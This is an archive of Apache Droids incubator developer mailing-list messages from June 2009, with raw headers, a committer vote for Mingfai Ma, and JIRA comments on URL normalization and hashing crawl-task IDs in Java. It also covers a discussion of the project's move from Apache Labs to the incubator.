<mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <droids-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 22020 invoked by uid 99); 5 Jun 2009 13:53:08 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 05 Jun 2009 13:53:08 +0000 X-ASF-Spam-Status: No, hits=1.2 required=10.0 tests=SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (athena.apache.org: local policy) Received: from [161.129.204.104] (HELO spunkymail-a4.g.dreamhost.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 05 Jun 2009 13:52:57 +0000 Received: from [161.129.204.104] (72-254-86-249.client.stsn.net [161.129.204.104]) by spunkymail-a4.g.dreamhost.com (Postfix) with ESMTP id 1FFBA3B9EE for <[email protected]>; Fri, 5 Jun 2009 06:52:37 -0700 (PDT) Message-Id: <[email protected]> From: Grant Ingersoll <[email protected]> To: [email protected] In-Reply-To: <1244185006.14878.4.camel@kenny> Content-Type: text/plain; charset=US-ASCII; format=flowed; delsp=yes Content-Transfer-Encoding: 7bit Mime-Version: 1.0 (Apple Message framework v935.3) Subject: Re: [Vote] Mingfai Ma as committer Date: Fri, 5 Jun 2009 06:52:35 -0700 References: <1244185006.14878.4.camel@kenny> X-Mailer: Apple Mail (2.935.3) X-Virus-Checked: Checked by ClamAV on apache.org +1 On Jun 4, 2009, at 11:56 PM, Thorsten Scherler wrote: > The droids pmc proposes Mingfai Ma to become a new committer. > > (S)he has > offered great contributions follows them through with the feeback > given > from the developers. > > https://issues.apache.org/jira/secure/IssueNavigator.jspa?reset=true&reporterSelect=specificuser&reporter=mingfai > > Please cast your votes. The voting period will end a week from today. > > http://www.timeanddate.com/counters/customcounter.html?year=2009&month=06&day=12 > > salu2 > -- > Thorsten Scherler <thorsten.at.apache.org> > Open Source <consulting, training and solutions> From [email protected] Fri Jun 05 14:13:08 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 68060 invoked from network); 5 Jun 2009 14:13:07 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 5 Jun 2009 14:13:07 -0000 Received: (qmail 70456 invoked by uid 500); 5 Jun 2009 14:13:19 -0000 Delivered-To: [email protected] Received: (qmail 70421 invoked by uid 500); 5 Jun 2009 14:13:19 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <droids-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 70411 invoked by uid 99); 5 Jun 2009 14:13:19 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 05 Jun 2009 14:13:19 +0000 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO web50307.mail.re2.yahoo.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Fri, 05 Jun 2009 14:13:07 +0000 Received: (qmail 22507 invoked by uid 60001); 5 Jun 2009 14:12:43 -0000 DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=yahoo.com; s=s1024; t=1244211163; bh=eMN4eARuIaRyUdF/SEi7Hfv9E9jWVtFNdmw94du9WtU=; h=Message-ID:X-YMail-OSG:Received:X-Mailer:References:Date:From:Subject:To:In-Reply-To:MIME-Version:Content-Type:Content-Transfer-Encoding; b=X/3qMpwhupmd00CjhfIBI/5jGbjzIE8v6ry13J8kyz32tFQSuqaCvmuq0rfp6KyoxMhLnzY8+GJBzI5jq5eeCfMi+pGU5UlknlcZp0QZMQrFOKwP2qsGYepG5arzykEkzsPy06Xr53dCU2/NBaNC5Vd+zek3beLOZw7IiYioGlE= DomainKey-Signature:a=rsa-sha1; q=dns; c=nofws; s=s1024; d=yahoo.com; h=Message-ID:X-YMail-OSG:Received:X-Mailer:References:Date:From:Subject:To:In-Reply-To:MIME-Version:Content-Type:Content-Transfer-Encoding; b=tUT14A+o4hmLpgrAqkwRWHuwR+l2W854LFhHSejCuTE/WO9ifmxCRmTRtLct9fPPlFLEPJ5vmo752NPmztDX/iBwtUo0+BFnAzxr2W5evmjdFgwIN8fuVbrKW4Ra9I3M+GqI7KOgdqP1bnCZN36Q5HG/BLbkLYFIxmHxsgCmxOY=; Message-ID: <[email protected]> X-YMail-OSG: iZYQaNcVM1lttS1MD4H6rpGj8oNitvThaCBLk3hbyPbSwujnRbuEasl8.aA2x8lAs5NdiFjOhgcRpN8YKU5mCaEgLb6Xt93Wp0Fl9OiovS1yPKQBdEYBUcaHOm_gSwsr_AU9fccBz01UKe2Aq_S9Q1LUsAcHAgT_e2HUCNGpOhN3qQinTx.dk4M0g3MoGOhslq5KOE5mVJyTT7HCAT2mLpeK9l6aTGrM7zTu7j3d6yUokjkqZ91aWxWeBW7Bv4_fHM1zVTcJbsQ2bDlss0VyMXS3OkUZnmVW6i_SRfo5KqPLpJKjhznzLDHXHaWjXEUUgs3pS8RR5l1jzqq0SOEZ2vM1uTGjjSP8iBuVSeE- Received: from [161.129.204.104] by web50307.mail.re2.yahoo.com via HTTP; Fri, 05 Jun 2009 07:12:43 PDT X-Mailer: YahooMailRC/1277.43 YahooMailWebService/0.7.289.15 References: <1244185006.14878.4.camel@kenny> Date: Fri, 5 Jun 2009 07:12:43 -0700 (PDT) From: Otis Gospodnetic <[email protected]> Subject: Re: [Vote] Mingfai Ma as committer To: [email protected] In-Reply-To: <1244185006.14878.4.camel@kenny> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: quoted-printable X-Virus-Checked: Checked by ClamAV on apache.org +1 :)=0A=0A Otis=0A=0A=0A=0A=0A----- Original Message ----=0A> From: Thorst= en Scherler <[email protected]>=0A> To: [email protected]= =0A> Sent: Friday, June 5, 2009 2:56:46 AM=0A> Subject: [Vote] Mingfai Ma a= s committer=0A> =0A> The droids pmc proposes Mingfai Ma to become a new com= mitter. =0A> =0A> (S)he has =0A> offered great contributions follows them = through with the feeback given=0A> from the developers.=0A> =0A> https://is= sues.apache.org/jira/secure/IssueNavigator.jspa?reset=3Dtrue&reporterSelect= =3Dspecificuser&reporter=3Dmingfai=0A> =0A> Please cast your votes. The vot= ing period will end a week from today.=0A> =0A> http://www.timeanddate.com/= counters/customcounter.html?year=3D2009&month=3D06&day=3D12=0A> =0A> salu2= =0A> -- =0A> =EF=BB=BFThorsten Scherler =0A> Open Source =0A From [email protected] Sun Jun 07 19:09:18 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 64921 invoked from network); 7 Jun 2009 19:09:18 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 7 Jun 2009 19:09:18 -0000 Received: (qmail 71765 invoked by uid 500); 7 Jun 2009 19:09:30 -0000 Delivered-To: [email protected] Received: (qmail 71720 invoked by uid 500); 7 Jun 2009 19:09:29 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <droids-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 71710 invoked by uid 99); 7 Jun 2009 19:09:29 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 07 Jun 2009 19:09:29 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 07 Jun 2009 19:09:27 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id A2B2E234C004 for <[email protected]>; Sun, 7 Jun 2009 12:09:07 -0700 (PDT) Message-ID: <216476457.1244401747651.JavaMail.jira@brutus> Date: Sun, 7 Jun 2009 12:09:07 -0700 (PDT) From: "Mingfai Ma (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Commented: (DROIDS-45) Fail to resolve outlink correctly In-Reply-To: <1093377227.1238676013090.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/DROIDS-45?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=12717083#action_12717083 ] Mingfai Ma commented on DROIDS-45: ---------------------------------- not sure if null path should be normalized to "/" {code} assertEquals("http://www.apache.org/", normalizer.normalize("http://www.apache.org")); {code} if a website behaves differently for null and "/" path, then there might be problem. {code} LinkNormalizer //apply pattens if (path != null && !"".equals(path)) for (Pattern pattern : PATH_REPLACEMENTS.keySet()) { path = pattern.matcher(path).replaceAll(PATH_REPLACEMENTS.get(pattern)); } else { path = "/"; } {code} changing "/" to null path is odd but may cause less problem. e.g. for http://www.apache.org, it just redirect the request to "http://www.apache.org", and the fetching operation won't be affected. I tested a couple of popular/famous websites and they will either redirect null path request to another url or to "/" path. One of the main function of this normalization is to avoid duplicated link as much as possible. > Fail to resolve outlink correctly > --------------------------------- > > Key: DROIDS-45 > URL: https://issues.apache.org/jira/browse/DROIDS-45 > Project: Droids > Issue Type: Bug > Components: core > Affects Versions: 0.01 > Reporter: Mingfai Ma > Attachments: DROIDS-45b.patch, DROIDS-45c.patch > > > I've encountered several cases that outlinks are not extracted correctly. Most are cause by the use of URI.resolve(). > 1. For a base URI of new URI("http://www.domain.com"), <a href="test.html">test.html</a> will be resolved to http://www.domain.comtest.html > 2. For a base URI of new URI("http://www.domain.com/index.php"), <a href="?test=true">test with param</a> will be resolved to http://www.domain.com/?test=true > 3. for <a href="http://www.yahoo.com\n">line break!</a>, URL.resolve will throw exception. And in a browser, it can resolves the URI. (remarks: I didn't check if this scenario affect the default Tika/NekoHTML parsing. ) > I suspect there are many different scenarios, many of them are probably caused by non-standard usage. (but a crawler has to handle non-standard usage in order to function) Obviously, we cannot cater every case, and I suggest to consider a resolve failure as a bug if a link works in a Mozilla browser but not in Droids LinkExtractor. > this issue is related to the LinkExtractor created in DROIDS-8 -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Mon Jun 08 08:50:21 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 64937 invoked from network); 8 Jun 2009 08:50:20 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 8 Jun 2009 08:50:20 -0000 Received: (qmail 26648 invoked by uid 500); 8 Jun 2009 08:50:32 -0000 Delivered-To: [email protected] Received: (qmail 26618 invoked by uid 500); 8 Jun 2009 08:50:32 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <droids-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 26605 invoked by uid 99); 8 Jun 2009 08:50:32 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 08 Jun 2009 08:50:32 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 08 Jun 2009 08:50:29 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 1C778234C1EC for <[email protected]>; Mon, 8 Jun 2009 01:50:08 -0700 (PDT) Message-ID: <237345846.1244451008115.JavaMail.jira@brutus> Date: Mon, 8 Jun 2009 01:50:08 -0700 (PDT) From: "Mingfai Ma (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Commented: (DROIDS-53) Implement a unique hash function for Task ID In-Reply-To: <1268351344.1243583805680.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/DROIDS-53?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=12717201#action_12717201 ] Mingfai Ma commented on DROIDS-53: ---------------------------------- hashCode in integer is signed (with negative number). it might be better to use unsigned long to represent signed integer hashcode. {code} public long unsignInteger(int hashCode){ long id = hashCode; id = (id << 32) >>> 32; return id; } {code} > Implement a unique hash function for Task ID > -------------------------------------------- > > Key: DROIDS-53 > URL: https://issues.apache.org/jira/browse/DROIDS-53 > Project: Droids > Issue Type: New Feature > Components: core > Reporter: Mingfai Ma > > For the SimpleTaskQueueWithHistory.previous, CrawlingWorker "// TODO -- make the hashvalue for Outlink...", > after some research, it seems to smaller hash that we could get easy is the hashCode() of URL String. It takes 16 bytes only. Java native hash code should be unique, otherwise, any HashTable or HashMap will be wrong. > if in case we need to represent it in String, we may compress the hashCode in base62, such as with the following function: > {code} > public static final char[] baseChars = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz".toCharArray(); > public static String base62(int hashCode) { > StringBuilder out = new StringBuilder(hashCode == 0 ? "0" : ""); > while(hashCode!=0){ > out.append(baseChars[hashCode % baseChars.size()]) > hashCode = hashCode / baseChars.size() > } > return out.reverse().toString(); > } > {code} > e.g. > {code} > assertEquals("c55Ow", base62("http://incubator.apache.org/droids/".hashCode()) ); > {code} > for 5 characters, it's 48 bytes. > It is important to get a short, unique hash function for URL. For any crawler that do not want duplication, we unavoidably have to store a URL hash in memory or data grid. (unless it is stored on disk or in a database at the cost of higher look up time) With a hashCode that takes 16bytes, it's around 15M heap size for 1M URLs. > This task is related to DROIDS-52 -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Sat Jun 13 08:57:13 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 2278 invoked from network); 13 Jun 2009 08:57:12 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 13 Jun 2009 08:57:12 -0000 Received: (qmail 85011 invoked by uid 500); 13 Jun 2009 08:57:24 -0000 Delivered-To: [email protected] Received: (qmail 84965 invoked by uid 500); 13 Jun 2009 08:57:24 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <droids-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 84954 invoked by uid 99); 13 Jun 2009 08:57:23 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 13 Jun 2009 08:57:23 +0000 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-ew0-f220.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 13 Jun 2009 08:57:13 +0000 Received: by ewy20 with SMTP id 20so3261548ewy.12 for <[email protected]>; Sat, 13 Jun 2009 01:56:52 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=googlemail.com; s=gamma; h=domainkey-signature:mime-version:sender:received:date :x-google-sender-auth:message-id:subject:from:to:content-type :content-transfer-encoding; bh=KJ3gaT6jQWR8/QpJ30oG5fPSMmcytzGxtfJlt4gm5Ew=; b=FBTgCw/mOoapQFOZCRqsGrapU7aWNOuPCygN31iRRmO75+PatkmtqvcYZOKLZyfBHP sEVVzzSCQ+g+8/Sbr1SFMDHB6yOdc88alscZ/7H1RTOKKFTMaOWVNL/96bNY5VckMLxq Aw/Vp0JBGs6o4VWLn08eL+tt4YTsSwDXVsisA= DomainKey-Signature: a=rsa-sha1; c=nofws; d=googlemail.com; s=gamma; h=mime-version:sender:date:x-google-sender-auth:message-id:subject :from:to:content-type:content-transfer-encoding; b=RDIyAQAOj/Is5zNinN1HcscIGuAqB+fVCb0eQAYtTBwJ2gBqq/STMIyx2jLLjV+mcb r0iOAXBNLo3v6AIHCU7fPWQtsql4D+rwpgbyeaXSLnbTVKECHQetl6mVZg8iMqxvXiLV fVSnRDTwdA4RI0ov0ugmdguHUJykq0kwrZZEA= MIME-Version: 1.0 Sender: [email protected] Received: by 161.129.204.104 with SMTP id 13mr1647986wep.24.1244883412344; Sat, 13 Jun 2009 01:56:52 -0700 (PDT) Date: Sat, 13 Jun 2009 09:56:52 +0100 X-Google-Sender-Auth: cffd2a74e049e0ba Message-ID: <[email protected]> Subject: Droids is listed in both the incubator and labs From: Ross Gardler <[email protected]> To: droids-dev <[email protected]>, labs <[email protected]> Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org Now that droids has moved to the incubator shouldn't it be moved from the labs site? -- Ross Gardler OSS Watch - supporting open source in education and research http://www.oss-watch.ac.uk From [email protected] Sun Jun 14 01:29:07 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 73134 invoked from network); 14 Jun 2009 01:29:07 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 14 Jun 2009 01:29:07 -0000 Received: (qmail 63945 invoked by uid 500); 14 Jun 2009 01:29:18 -0000 Delivered-To: [email protected] Received: (qmail 63899 invoked by uid 500); 14 Jun 2009 01:29:18 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <droids-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 63889 invoked by uid 99); 14 Jun 2009 01:29:18 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 14 Jun 2009 01:29:18 +0000 X-ASF-Spam-Status: No, hits=1.2 required=10.0 tests=SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO spunkymail-a1.g.dreamhost.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 14 Jun 2009 01:29:05 +0000 Received: from [161.129.204.104] (adsl-065-013-152-164.sip.rdu.bellsouth.net [161.129.204.104]) by spunkymail-a1.g.dreamhost.com (Postfix) with ESMTP id 9F879FE218 for <[email protected]>; Sat, 13 Jun 2009 18:28:41 -0700 (PDT) Message-Id: <[email protected]> From: Grant Ingersoll <[email protected]> To: [email protected] In-Reply-To: <[email protected]> Content-Type: text/plain; charset=US-ASCII; format=flowed; delsp=yes Content-Transfer-Encoding: 7bit Mime-Version: 1.0 (Apple Message framework v935.3) Subject: Re: [Vote] Mingfai Ma as committer Date: Sat, 13 Jun 2009 21:28:40 -0400 References: <1244185006.14878.4.camel@kenny> <[email protected]> X-Mailer: Apple Mail (2.935.3) X-Virus-Checked: Checked by ClamAV on apache.org This has passed, AFAICT. Mingfai, can you send in a CLA. See http://www.apache.org/dev/new-committers-guide.html Once that is in, I can request an account for you and get you SVN access. Also, as is often tradition in Lucene land, a little intro about who you are is always nice. -Grant On Jun 5, 2009, at 10:12 AM, Otis Gospodnetic wrote: > > +1 :) > > Otis > > > > > ----- Original Message ---- >> From: Thorsten Scherler <[email protected]> >> To: [email protected] >> Sent: Friday, June 5, 2009 2:56:46 AM >> Subject: [Vote] Mingfai Ma as committer >> >> The droids pmc proposes Mingfai Ma to become a new committer. >> >> (S)he has >> offered great contributions follows them through with the feeback >> given >> from the developers. >> >> https://issues.apache.org/jira/secure/IssueNavigator.jspa?reset=true&reporterSelect=specificuser&reporter=mingfai >> >> Please cast your votes. The voting period will end a week from today. >> >> http://www.timeanddate.com/counters/customcounter.html?year=2009&month=06&day=12 >> >> salu2 >> -- >> Thorsten Scherler >> Open Source > From [email protected] Wed Jun 17 12:14:42 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 60465 invoked from network); 17 Jun 2009 12:14:41 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 17 Jun 2009 12:14:41 -0000 Received: (qmail 213 invoked by uid 500); 17 Jun 2009 12:14:53 -0000 Delivered-To: [email protected] Received: (qmail 155 invoked by uid 500); 17 Jun 2009 12:14:53 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <droids-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 99985 invoked by uid 99); 17 Jun 2009 12:14:53 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 17 Jun 2009 12:14:53 +0000 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-bw0-f219.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 17 Jun 2009 12:14:42 +0000 Received: by bwz19 with SMTP id 19so261654bwz.12 for <multiple recipients>; Wed, 17 Jun 2009 05:14:21 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=googlemail.com; s=gamma; h=domainkey-signature:mime-version:sender:received:in-reply-to :references:date:x-google-sender-auth:message-id:subject:from:to:cc :content-type:content-transfer-encoding; bh=lzhh9X19DFkQMSQSiYOaCn9qOSUVaS05zbVKuJXRHUs=; b=RDbxcS7lfl7ImhJ0LY6TtvP8WnX1BgT76pWZ+3tjTFV1cgemh3wJGnd8zUZmm3/sjp V7C4GIOOrItxD1puKpNisvQNN0dbcaDCKLpf1mltRMg0eab0scgPWlYNY2xg3sfCpQX/ JaPIbD8sAyYUcjE82a0IVLjORH9IvQ1Rc2WLw= DomainKey-Signature: a=rsa-sha1; c=nofws; d=googlemail.com; s=gamma; h=mime-version:sender:in-reply-to:references:date :x-google-sender-auth:message-id:subject:from:to:cc:content-type :content-transfer-encoding; b=Td2hbaN0BAggRAZIU8k4c4BtAQbKD8YjmeCPOOKS3YkG5MXnIV6rpV7jo2b/hTGJO3 QsmpzYD1q6B0mLjrV+43SEVDfK2bBrxK9pTDziAH9SzMWIBYy4vhhOYMp0IZpR9EO56e 1aifMba/gH/QYoFKPkrfy7K2f5ZCllp0hs72o= MIME-Version: 1.0 Sender: [email protected] Received: by 161.129.204.104 with SMTP id a52mr33785wea.145.1245240860992; Wed, 17 Jun 2009 05:14:20 -0700 (PDT) In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> <[email protected]> Date: Wed, 17 Jun 2009 13:14:20 +0100 X-Google-Sender-Auth: 673ce0fb1fb5bbba Message-ID: <[email protected]> Subject: Re: Crawler From: Ross Gardler <[email protected]> To: [email protected] Cc: droids-dev <[email protected]> Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org [cc'd to droids list for info since I'm a mentor there too] 2009/6/17 Robert Burrell Donkin <[email protected]>: > Ross Gardler wrote: >> 2009/6/17 Robert Burrell Donkin <[email protected]>: >>> i made a start on a crawler module yesterday to make it easier to >>> download all releases from an URL. >> >> Why not use Droids? >> >> http://incubator.apache.org/droids/ > > in terms of downloading tech... > > i did consider looking into droids but couldn't find a release and it > required jdk 1.6 so concluded that it's not an immediate option (i > needed something right away) Fair enough, maybe the Droids people will be prompted into makind a release (JDK1.5 preferably) > in the medium term, i think moving to droids sounds like the right move > > in terms of process, i see crawler as a replacement for the recursive > rat script: download a release tree, check sums and signatures, unpack > releases then run rat on each so it's more than just droids. Sure it is, but an important part of that is the crawler and I don't think we shuold be duplicating effort across two projects. Maybe this mail will encourage the droids team to create a release that we can use as the crawler. Ross -- Ross Gardler OSS Watch - supporting open source in education and research http://www.oss-watch.ac.uk From [email protected] Thu Jun 18 07:36:56 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 25683 invoked from network); 18 Jun 2009 07:36:56 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 18 Jun 2009 07:36:56 -0000 Received: (qmail 39360 invoked by uid 500); 18 Jun 2009 07:37:07 -0000 Delivered-To: [email protected] Received: (qmail 39084 invoked by uid 500); 18 Jun 2009 07:37:06 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <droids-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 39065 invoked by uid 99); 18 Jun 2009 07:37:06 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 18 Jun 2009 07:37:06 +0000 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mta.juntadeandalucia.es) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 18 Jun 2009 07:36:58 +0000 Received: from [161.129.204.104] (helo=mail.juntadeandalucia.es) by guadix2.juntadeandalucia.es with esmtps (TLSv1:AES256-SHA:256) (Exim 4.69) (envelope-from <[email protected]>) id 1MHCAn-0000hq-E6; Thu, 18 Jun 2009 09:36:37 +0200 Received: from [161.129.204.104] by mail.juntadeandalucia.es with esmtpa (Exim 4.69) (envelope-from <[email protected]>) id 1MHCAn-0007OQ-9U; Thu, 18 Jun 2009 09:36:37 +0200 Subject: Re: Droids is listed in both the incubator and labs From: Thorsten Scherler <[email protected]> To: [email protected] Cc: labs <[email protected]> In-Reply-To: <[email protected]> References: <[email protected]> Content-Type: text/plain; charset=utf-8 Date: Thu, 18 Jun 2009 09:44:47 +0200 Message-Id: <1245311087.6354.5.camel@panic> Mime-Version: 1.0 X-Mailer: Evolution 161.129.204.104 Content-Transfer-Encoding: quoted-printable X-Spam-Score: -99 X-Spam-Score-Int: -99 X-Virus-Checked: Checked by ClamAV on apache.org On Sat, 2009-06-13 at 09:56 +0100, Ross Gardler wrote: > Now that droids has moved to the incubator shouldn't it be moved from > the labs site? http://svn.apache.org/repos/asf/labs/droids/doap.rdf Here we state that is promoted and we moved the files to the incubator. IMO that is exactly what we had to do. Maybe in the labs webpage http://labs.apache.org/labs.html droids needs to be clearly labeled to be promoted. I guess like any other other project that left labs (e.g. Vysper).=20 salu2 --=20 Thorsten Scherler <thorsten.at.apache.org> Open Source Java <consulting, training and solutions> Sociedad Andaluza para el Desarrollo de la Sociedad=20 de la Informaci=C3=B3n, S.A.U. (SADESI) From [email protected] Thu Jun 18 07:50:25 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 28868 invoked from network); 18 Jun 2009 07:50:25 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 18 Jun 2009 07:50:25 -0000 Received: (qmail 66181 invoked by uid 500); 18 Jun 2009 07:50:36 -0000 Delivered-To: [email protected] Received: (qmail 66155 invoked by uid 500); 18 Jun 2009 07:50:36 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <droids-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 66145 invoked by uid 99); 18 Jun 2009 07:50:36 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 18 Jun 2009 07:50:36 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 18 Jun 2009 07:50:27 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 579AF234C044 for <[email protected]>; Thu, 18 Jun 2009 00:50:07 -0700 (PDT) Message-ID: <1581100439.1245311407344.JavaMail.jira@brutus> Date: Thu, 18 Jun 2009 00:50:07 -0700 (PDT) From: "Thorsten Scherler (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Commented: (DROIDS-52) Optimize memory usage of TaskQueue and History In-Reply-To: <295189861.1242727307037.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit 